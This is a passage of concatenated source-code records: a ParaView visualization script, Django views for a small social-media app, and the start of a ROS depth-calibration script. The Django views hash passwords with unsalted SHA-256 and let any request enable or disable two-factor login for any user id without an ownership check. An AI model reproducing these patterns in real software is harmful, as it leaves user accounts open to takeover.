legend\nclip6Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Slice'\nslice2 = Slice(Input=clip6)\nslice2.SliceType = 'Plane'\nslice2.SliceOffsetValues = [0.0]\n\n# init the 'Plane' selected for 
'SliceType'\nslice2.SliceType.Origin = [0.0, -0.02500000037252903, 0.029999999329447746]\n\n# show data in view\nslice2Display = Show(slice2, renderView1)\n# trace defaults for the display properties.\nslice2Display.Representation = 'Surface'\nslice2Display.ColorArrayName = ['POINTS', 'p']\nslice2Display.LookupTable = pLUT\nslice2Display.OSPRayScaleArray = 'p'\nslice2Display.OSPRayScaleFunction = 'PiecewiseFunction'\nslice2Display.SelectOrientationVectors = 'U'\nslice2Display.ScaleFactor = 0.01799999959766865\nslice2Display.SelectScaleArray = 'p'\nslice2Display.GlyphType = 'Arrow'\nslice2Display.GlyphTableIndexArray = 'p'\nslice2Display.DataAxesGrid = 'GridAxesRepresentation'\nslice2Display.PolarAxes = 'PolarAxesRepresentation'\nslice2Display.GaussianRadius = 0.008999999798834325\nslice2Display.SetScaleArray = ['POINTS', 'p']\nslice2Display.ScaleTransferFunction = 'PiecewiseFunction'\nslice2Display.OpacityArray = ['POINTS', 'p']\nslice2Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip6, renderView1)\n\n# show color bar/color legend\nslice2Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# toggle 3D widget visibility (only when running from the GUI)\nHide3DWidgets(proxy=slice2.SliceType)\n\n# set active source\nSetActiveSource(slice1)\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'T'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(pLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'T'\ntLUT = GetColorTransferFunction('T')\ntLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1256.1572265625, 0.865003, 0.865003, 0.865003, 2214.314453125, 0.705882, 0.0156863, 0.14902]\ntLUT.ScalarRangeInitialized = 1.0\n\n# set active source\nSetActiveSource(slice2)\n\n# set scalar coloring\nColorBy(slice2Display, ('POINTS', 'TMean'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(pLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice2Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice2Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'TMean'\ntMeanLUT = GetColorTransferFunction('TMean')\ntMeanLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1194.8056640625, 0.865003, 0.865003, 0.865003, 2091.611328125, 0.705882, 0.0156863, 0.14902]\ntMeanLUT.ScalarRangeInitialized = 1.0\n\n# create a new 'Temporal Statistics'\ntemporalStatistics1 = TemporalStatistics(Input=slice2)\n\n# Properties modified on temporalStatistics1\ntemporalStatistics1.ComputeMinimum = 0\ntemporalStatistics1.ComputeMaximum = 0\ntemporalStatistics1.ComputeStandardDeviation = 0\n\n# show data in view\ntemporalStatistics1Display = Show(temporalStatistics1, renderView1)\n# trace defaults for the display properties.\ntemporalStatistics1Display.Representation = 'Surface'\ntemporalStatistics1Display.ColorArrayName = [None, '']\ntemporalStatistics1Display.OSPRayScaleArray = 'CH4Mean_average'\ntemporalStatistics1Display.OSPRayScaleFunction = 
'PiecewiseFunction'\ntemporalStatistics1Display.SelectOrientationVectors = 'CH4Mean_average'\ntemporalStatistics1Display.ScaleFactor = 0.01799999959766865\ntemporalStatistics1Display.SelectScaleArray = 'CH4Mean_average'\ntemporalStatistics1Display.GlyphType = 'Arrow'\ntemporalStatistics1Display.GlyphTableIndexArray = 'CH4Mean_average'\ntemporalStatistics1Display.DataAxesGrid = 'GridAxesRepresentation'\ntemporalStatistics1Display.PolarAxes = 'PolarAxesRepresentation'\ntemporalStatistics1Display.GaussianRadius = 0.008999999798834325\ntemporalStatistics1Display.SetScaleArray = ['POINTS', 'CH4Mean_average']\ntemporalStatistics1Display.ScaleTransferFunction = 'PiecewiseFunction'\ntemporalStatistics1Display.OpacityArray = ['POINTS', 'CH4Mean_average']\ntemporalStatistics1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(slice2, renderView1)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'TMean_average'))\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'TMean_average'\ntMean_averageLUT = GetColorTransferFunction('TMean_average')\ntMean_averageLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1189.994873046875, 0.865003, 0.865003, 0.865003, 2081.98974609375, 0.705882, 0.0156863, 0.14902]\ntMean_averageLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'UMean_average', 'Magnitude'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(tMean_averageLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'UMean_average'\nuMean_averageLUT = GetColorTransferFunction('UMean_average')\nuMean_averageLUT.RGBPoints = [0.0, 0.231373, 0.298039, 0.752941, 19.858241780686676, 0.865003, 0.865003, 0.865003, 39.71648356137335, 0.705882, 0.0156863, 0.14902]\nuMean_averageLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'UMean_average', 'Z'))\n\n# rescale color and/or opacity maps used to exactly fit the current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(False, False)\n\n# Update a scalar bar component title.\nUpdateScalarBarsComponentTitle(uMean_averageLUT, temporalStatistics1Display)\n\n# set active source\nSetActiveSource(slice1)\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'U', 'Magnitude'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(tLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'U'\nuLUT = GetColorTransferFunction('U')\nuLUT.RGBPoints = [0.0, 0.231373, 0.298039, 0.752941, 19.061934160671782, 0.865003, 0.865003, 0.865003, 38.123868321343565, 0.705882, 
0.0156863, 0.14902]\nuLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'U', 'Z'))\n\n# rescale color and/or opacity maps used to exactly fit the current data range\nslice1Display.RescaleTransferFunctionToDataRange(False, False)\n\n# Update a scalar bar component title.\nUpdateScalarBarsComponentTitle(uLUT, slice1Display)\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n# save screenshot\nSaveScreenshot('snapshot_U_UMean_Z.png', renderView1, ImageResolution=[2199, 1890])\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'T'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(uLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# set active source\nSetActiveSource(temporalStatistics1)\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'TMean_average'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(uMean_averageLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# set active source\nSetActiveSource(slice1)\n\nanimationScene1.GoToLast()\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n# save screenshot\nSaveScreenshot('snapshot_T_TMean.png', renderView1, ImageResolution=[2199, 1890])\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n#### uncomment the following to render all views\n# RenderAllViews()\n# alternatively, if you want to write images, you can use SaveScreenshot(...).\n","repo_name":"Combustion-Zhen/OpenFOAM_py","sub_path":"SwB/snapshot_Mean.py","file_name":"snapshot_Mean.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21724265818","text":"from django.views.generic import UpdateView\nfrom django.views.generic.edit import CreateView\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.list import ListView\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom django.db import IntegrityError\nfrom django.urls import reverse\nfrom django.db.models import Count, Q\nfrom django.utils import timezone\nimport datetime\nimport pytz\nfrom django.db.models import Count\nfrom operator import attrgetter\n\nfrom .models 
import User, Post, Report, Tag, Follow, Chat, Message, Comment\nfrom .commentcode import add_comment\nfrom .getposts import get_posts\nfrom .deleteuser import delete_user\nfrom .tagcode import addtag, removetag\nfrom .followcode import addFollow, removeFollow, getFollowers, getFollowing, deleteFollow\nfrom .timelinecode import timeline_by_tag, get_timeline_posts, timeline_by_text, timeline_by_date, timeline_by_trending\nfrom .postrequestcode import post_request_from_post\nfrom .chatcode import createChat, addUser, removeUser, createMessage, deleteMessage, getChats, deleteChat\n\nimport hashlib\nimport pyotp\n\nclass LoginView(TemplateView):\n template_name = \"login/login.html\"\n\n\nclass RegisterView(TemplateView):\n template_name = \"login/register.html\"\n\n def post(self, request):\n name = request.POST.get('nameinput', None)\n firstname, lastname = name.split()\n username = request.POST.get('usernameinput', None)\n email = request.POST.get('emailinput', None)\n password = request.POST.get('passwordinput', None)\n password_confirm = request.POST.get('confirmpasswordinput', None)\n enc_password = encrypt_string(password)\n\n user = User(firstname=firstname, lastname=lastname, username=username, email=email,\n password=enc_password)\n\n # TODO validate all fields exist & are valid\n\n try:\n user.save()\n except IntegrityError:\n # TODO tell user username/email is already taken\n return redirect('register')\n\n request.session['userid'] = user.pk\n\n return redirect('mainpage')\n\n\nclass MainPageView(TemplateView):\n template_name = \"mainpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n user = User.objects.get(pk=self.request.session['userid'])\n context = super(MainPageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['user'] = user\n context['follows'] = getFollowing(self.request.session['userid'])\n if 'word_search' in self.request.GET:\n word = self.request.GET.get('word_search',None)\n context['posts'] = timeline_by_text(user,word)\n elif 'date_search' in self.request.GET:\n date = self.request.GET.get('date_search',None)\n #date_array = given.split('/')\n #date = date_array[2] + \"-\" + date_array[0] + \"-\" + date_array[1]\n context['posts'] = timeline_by_date(user,date)\n elif 'tag_search' in self.request.GET:\n tag_name = self.request.GET.get('tag_search',None)\n print('context 3')\n print(tag_name)\n context['posts'] = timeline_by_tag(user,tag_name)\n elif 'trending' in self.request.GET:\n print('context 4')\n context['posts'] = timeline_by_trending(user)\n else:\n print('context 5')\n context['posts'] = get_timeline_posts(user)\n user.prev_time_line_view = user.curr_time_line_view\n user.curr_time_line_view = timezone.now()\n user.save()\n return context\n\n def post(self,request):\n print(request)\n post_request_from_post(self,request)\n return redirect('mainpage')\n\n\n\nclass SettingsPageView(UpdateView):\n template_name_suffix = '_update_form'\n model = User\n fields = ['firstname', 'lastname', 'username', 'email', 'password', 'private']\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_object(self, queryset=None):\n try:\n return User.objects.get(pk=self.request.session['userid'])\n except User.DoesNotExist:\n return 
None\n\n def get_context_data(self, **kwargs):\n context = super(SettingsPageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n print(request.POST)\n if 'delete_user' in request.POST:\n delete_user(self.request.session.get('userid'))\n return redirect('login')\n if 'username_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.username = request.POST.get(\"username\")\n user.save()\n return redirect('settingspage')\n if 'email_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.email = request.POST.get(\"email\")\n user.save()\n return redirect('settingspage')\n if 'password_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.password = encrypt_string(request.POST.get(\"password\"))\n user.save()\n return redirect('settingspage')\n if 'private_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.private = 'private' in request.POST\n user.save()\n return redirect('settingspage')\n if 'chat_privacy' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.chat_privacy = request.POST.get(\"chat_privacy\")\n user.save()\n return redirect('settingspage')\n\n\nclass ProfilePageView(UpdateView):\n template_name_suffix = '_profile_page'\n model = User\n fields = ['firstname', 'lastname', 'username', 'email', 'password']\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_object(self, queryset=None):\n return User.objects.get(pk=self.kwargs['pk'])\n\n def post(self, request, pk):\n post_request_from_post(self, request)\n return redirect(reverse('userprofilepage', kwargs={'pk': self.kwargs['pk']}))\n\n def get_context_data(self, **kwargs):\n context = super(ProfilePageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['following_list'] = getFollowing(context['user'].id)\n context['follower_list'] = getFollowers(context['user'].id)\n context['logged_in_user'] = User.objects.get(id=self.request.session.get('userid', None))\n context['follows_me'] = context['user'].followings.filter(following__id = context['userid']).exists()\n return context\n\nclass BannedView(TemplateView):\n template_name = \"banned.html\"\n\nclass ChatView(TemplateView):\n template_name = \"chatpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['chat'] = Chat.objects.get(id=self.kwargs['pk'])\n context['all_chats'] = getChats(self.request.session.get('userid', None))\n return context\n\n def post(self, request, pk):\n print(request.POST)\n if 'add_member' in request.POST:\n try:\n user_id = User.objects.get(username=request.POST.get('add_member', None)).id\n addUser(pk,user_id)\n except:\n print(\"Invalid User Request\")\n if 'remove_member' in request.POST:\n try:\n user_id = User.objects.get(username=request.POST.get('remove_member', None)).id\n user = self.request.session.get('userid', None)\n if user_id != user:\n removeUser(pk,user_id)\n except:\n 
print(\"Invalid User Request\")\n if 'delete_chat' in request.POST:\n user = self.request.session.get('userid', None)\n deleteChat(pk, user)\n return redirect('chatnavpage')\n if 'leave_chat' in request.POST:\n user = self.request.session.get('userid', None)\n removeUser(pk, user)\n return redirect('chatnavpage')\n if 'delete_message' in request.POST:\n message_id = request.POST.get('delete_message', None)\n deleteMessage(message_id)\n if 'postinput' in request.POST:\n user_id = self.request.session.get('userid', None)\n content = username=request.POST.get('postinput', None)\n image = request.FILES.get('image', None)\n print(request.FILES)\n if len(content) != 0:\n createMessage(user_id, content, pk, image)\n return redirect('chatviewpage', pk=pk)\n\nclass ChatNavView(TemplateView):\n template_name = \"chatnav.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['all_chats'] = getChats(self.request.session.get('userid', None))\n return context\n\n def post(self, request):\n if 'create_chat' in request.POST:\n name = request.POST.get('create_chat', None)\n chat = createChat(name, self.request.session.get('userid', None))\n return redirect('chatviewpage', pk=chat.id)\n\nclass MakePostView(TemplateView):\n template_name = \"makepostpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(MakePostView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n tags = request.POST.get('taginput', None).split(\",\")\n content = request.POST.get('postinput', None)\n image = request.FILES.get('image', None)\n user = User.objects.get(id=self.request.session.get('userid'))\n private = 'private' in request.POST\n if not content and not image:\n # TODO: report error\n return redirect('mainpage')\n post = Post(content=content, creator=user, image=image, private=private)\n post.save()\n for tag in tags:\n addtag(tag, post)\n return redirect('mainpage')\n\nclass SearchView(TemplateView):\n template_name = \"searchpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(SearchView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n user_name = request.POST.get('searchinput', None)\n try:\n user = User.objects.get(username=user_name)\n except User.DoesNotExist:\n return redirect('searchpage')\n return redirect(reverse('userprofilepage', kwargs={'pk': user.pk}))\n\n\nclass FriendView(TemplateView):\n template_name = \"friend_page_profile.html\"\n\nclass UserSearchView(TemplateView):\n template_name = \"user_search_page.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, 
self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\nclass UserSearchResultView(ListView):\n template_name = \"user_search_result_page.html\"\n model = Post\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_queryset(self, **kwargs):\n if 'word_search' in self.request.GET:\n post_content = self.request.GET.get('word_search')\n return Post.objects.filter(content__icontains=post_content)\n\n if 'tag_search' in self.request.GET:\n post_tag = self.request.GET.get('tag_search')\n return Post.objects.filter(tag__name=post_tag)\n\n if 'user_search' in self.request.GET:\n post_user = self.request.GET.get('user_search')\n try:\n user_id = User.objects.get(username=post_user).id\n except:\n return None\n return Post.objects.filter(creator=user_id)\n\n if 'name_search' in self.request.GET:\n post_user = self.request.GET.get('name_search')\n name = post_user.split(\" \")\n if len(name) == 1:\n return Post.objects.filter(Q(creator__firstname__icontains=name[0]) | Q(creator__lastname__icontains=name[0]))\n else:\n return Post.objects.filter(Q(creator__firstname__icontains=name[0]) | Q(creator__lastname__icontains=name[0]) | Q(creator__firstname__icontains=name[1]) | Q(creator__lastname__icontains=name[1]))\n\n if 'tag_user_search' in self.request.GET:\n post_combo = self.request.GET.get('tag_user_search')\n split_combo = post_combo.split('/')\n try:\n user_id = User.objects.get(username=split_combo[1]).id\n return Post.objects.filter(tag__name=split_combo[0],creator=user_id)\n except:\n return None\n if 'date_search' in self.request.GET:\n given = self.request.GET.get('date_search')\n date_array = given.split('/')\n #date = date_array[2] + \"-\" + date_array[0] + \"-\" + date_array[1]\n try:\n return Post.objects.filter(created__contains=datetime.date(int(date_array[2]), int(date_array[0]), int(date_array[1])))\n except:\n return None\n \n if 'top_tag_search' in self.request.GET:\n tag = self.request.GET.get('top_tag_search')\n top_posts = Post.objects.filter(tag__name=tag).annotate(t_count=Count('likers')).order_by('-t_count')\n return top_posts\n\n if 'trending' in self.request.GET:\n return Post.objects.all().annotate(num_likes=Count('likers')).order_by('-num_likes')\n\n def get_context_data(self, **kwargs):\n context = super(ListView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n\n def post(self, request):\n post_request_from_post(self, request)\n return redirect('mainpage')\n\ndef encrypt_string(string):\n return hashlib.sha256(string.encode()).hexdigest()\n\n\ndef my_authenticate(username, password):\n password = encrypt_string(password)\n query = User.objects.filter(username=username) | User.objects.filter(email=username)\n if query.exists() and query[0].password == password:\n return query[0]\n else:\n return None\n\ndef login_user(request):\n username = request.POST.get('usernameinput', None)\n password = request.POST.get('passwordinput', None)\n otp_code = request.POST.get('otpinput', None)\n user = my_authenticate(username, password)\n if user is not None:\n if user.banned_until is not None and user.banned_until > datetime.date.today():\n return redirect('banned')\n if user.otp_secret:\n totp = pyotp.TOTP(user.otp_secret)\n if not totp.verify(otp_code):\n return redirect('login')\n request.session['userid'] = user.pk\n return 
redirect('mainpage')\n else:\n # TODO: display error message to users\n return redirect('login')\n\ndef logout_user(request):\n request.session['userid'] = None\n return redirect('login')\n\n##\n# TODO: proper error handling:\n# - User not logged in\n# - User ID invalid\n# - Post ID invalid\n#\n# TODO: implement for AJAX\n#\ndef report_post(request, pk):\n user = User.objects.get(pk=request.session['userid'])\n post = Post.objects.get(pk=pk)\n report = Report(reporter=user, post=post)\n report.save()\n return redirect('mainpage')\n\ndef block_user(request, pk):\n blockee = User.objects.get(pk=pk)\n blocker = User.objects.get(pk=request.session['userid'])\n blocker.blocking.add(blockee)\n blocker.save()\n # TODO: delete existing following relationship\n deleteFollow(pk, blocker.username)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef unblock_user(request, pk):\n blockee = User.objects.get(pk=pk)\n blocker = User.objects.get(pk=request.session['userid'])\n blocker.blocking.remove(blockee)\n blocker.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef request_verification(request, pk):\n user = User.objects.get(pk=pk)\n if user.verified == 0:\n user.verified = 1\n user.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef enable_2fa(request, pk):\n user = User.objects.get(pk=pk)\n if not user.otp_secret:\n user.otp_secret = pyotp.random_base32()\n user.save()\n return redirect('mainpage')\n\ndef disable_2fa(request, pk):\n user = User.objects.get(pk=pk)\n if user.otp_secret:\n user.otp_secret = \"\"\n user.save()\n return redirect('mainpage')\n","repo_name":"karagenit/twistter","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74717873367","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg') # NOQA\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom jsk_recognition_msgs.msg import DepthErrorResult\nfrom sklearn import linear_model\nimport time\nimport threading\nimport sys\nimport rospy\nimport argparse\nimport csv\nimport math\nimport datetime\nfrom jsk_recognition_msgs.srv import SetDepthCalibrationParameter\nfrom jsk_recognition_msgs.msg import DepthCalibrationParameter\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nxs = []\nraw_xs = []\nys = []\nus = []\nvs = []\nc_us = []\nc_vs = []\nvalue_cache = dict() # (u, v) -> [z]\neps_z = 0.1 # 10cm\nlock = threading.Lock()\nu_min = None\nu_max = None\nv_min = None\nv_max = None\nmodel = None\nset_param = None\nMODELS = [\"linear\", \"quadratic\", \"quadratic-uv\", \"quadratic-uv-abs\", \"quadratic-uv-quadratic\", \"quadratic-uv-quadratic-abs\"]\n\n# use raw_input for python2 c.f. 
https://stackoverflow.com/questions/5868506/backwards-compatible-input-calls-in-python\nif hasattr(__builtins__, 'raw_input'):\n input = raw_input\n\ndef query_yes_no(question, default=None):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is one of \"yes\" or \"no\".\n \"\"\"\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n\ndef getXFromFeatureVector(v):\n if model == \"linear\":\n return v[0]\n elif model == \"quadratic\":\n return v[1]\n elif model == \"quadratic-uv\" or model == \"quadratic-uv-abs\":\n return v[-3]\n elif model == \"quadratic-uv-quadratic\" or model == \"quadratic-uv-quadratic-abs\":\n return v[-5]\n\ndef genFeatureVector(x, u, v, cu, cv):\n global model\n x2 = x * x\n u2 = u * u\n v2 = v * v\n if model == \"linear\":\n return [x]\n elif model == \"quadratic\":\n return [x2, x]\n elif model == \"quadratic-uv\":\n return [u * x2, v * x2, x2,\n u * x, v * x, x,\n u, v]\n elif model == \"quadratic-uv-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n return [u * x2, v * x2, x2,\n u * x, v * x, x,\n u, v]\n elif model == \"quadratic-uv-quadratic\":\n return [u2 * x2, u * x2, v2 * x2, v * x2, x2, \n u2 * x, u * x, v2 * x, v * x, x, \n u2, u, v2, v]\n elif model == \"quadratic-uv-quadratic-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n u2 = u * u\n v2 = v * v\n return [u2 * x2, u * x2, v2 * x2, v * x2, x2, \n u2 * x, u * x, v2 * x, v * x, x, \n u2, u, v2, v]\n\ndef isValidClassifier(classifier):\n # before classifire outputs meaningful value,\n # intercept is a list, so we skip the value\n c0 = classifier.intercept_\n return not hasattr(c0, \"__len__\");\n \ndef setParameter(classifier):\n global set_param\n c = classifier.coef_\n c0 = classifier.intercept_\n param = DepthCalibrationParameter()\n if not isValidClassifier(classifier):\n print(\"parameters are list\")\n return\n if model == \"linear\":\n param.coefficients2 = [0, 0, 0, 0, 0]\n param.coefficients1 = [0, 0, 0, 0, c[0]]\n param.coefficients0 = [0, 0, 0, 0, c0]\n param.use_abs = False\n elif model == \"quadratic\":\n param.coefficients2 = [0, 0, 0, 0, c[0]]\n param.coefficients1 = [0, 0, 0, 0, c[1]]\n param.coefficients0 = [0, 0, 0, 0, c0]\n param.use_abs = False\n elif model == \"quadratic-uv\":\n param.coefficients2 = [0, c[0], 0, c[1], c[2]]\n param.coefficients1 = [0, c[3], 0, c[4], c[5]]\n param.coefficients0 = [0, c[6], 0, c[7], c0]\n param.use_abs = False\n elif model == \"quadratic-uv-abs\":\n param.coefficients2 = [0, c[0], 0, c[1], c[2]]\n param.coefficients1 = [0, c[3], 0, c[4], c[5]]\n param.coefficients0 = [0, c[6], 0, c[7], c0]\n param.use_abs = True\n elif model == \"quadratic-uv-quadratic\":\n param.coefficients2 = c[0:5]\n param.coefficients1 = c[5:10]\n param.coefficients0 = [c[10], c[11], c[12], c[13], 
c0]\n param.use_abs = False\n elif model == \"quadratic-uv-quadratic-abs\":\n param.coefficients2 = c[0:5]\n param.coefficients1 = c[5:10]\n param.coefficients0 = [c[10], c[11], c[12], c[13], c0]\n param.use_abs = True\n set_param(param)\n\ndef processData(x, y, u, v, cu, cv, fit = True):\n global xs, ys, classifier, u_min, u_max, v_min, v_max, raw_xs\n uu = int(u/10)\n vv = int(v/10)\n with lock:\n if (uu, vv) in value_cache:\n zs = value_cache[(uu, vv)]\n for z in zs:\n if abs(z - y) < eps_z:\n print(\"duplicated value\")\n return\n else:\n value_cache[(uu, vv)].append(y)\n else:\n value_cache[(uu, vv)] = [y]\n raw_xs.append(x)\n us.append(u)\n vs.append(v)\n c_us.append(cu)\n c_vs.append(cv)\n if u > u_min and u < u_max and v < v_max and v > v_min:\n print((x, y))\n xs.append(genFeatureVector(x, u, v, cu, cv))\n ys.append(y)\n if fit:\n classifier.fit(xs, ys)\n try:\n setParameter(classifier)\n except rospy.service.ServiceException as e:\n rospy.logfatal(\"failed to call service: %s\" % (e.message))\n try:\n print(modelEquationString(classifier))\n except Exception as e:\n rospy.logwarn(\"failed to print model: %s\" % e.message)\n \n else:\n print(\"(%d, %d) is out of range\" % (u, v))\n \ndef callback(msg):\n global xs, ys, classifier, u_min, u_max, v_min, v_max, raw_xs\n \n x = msg.observed_depth\n y = msg.true_depth\n u = msg.u\n v = msg.v\n if math.isnan(x) or math.isnan(y):\n return\n 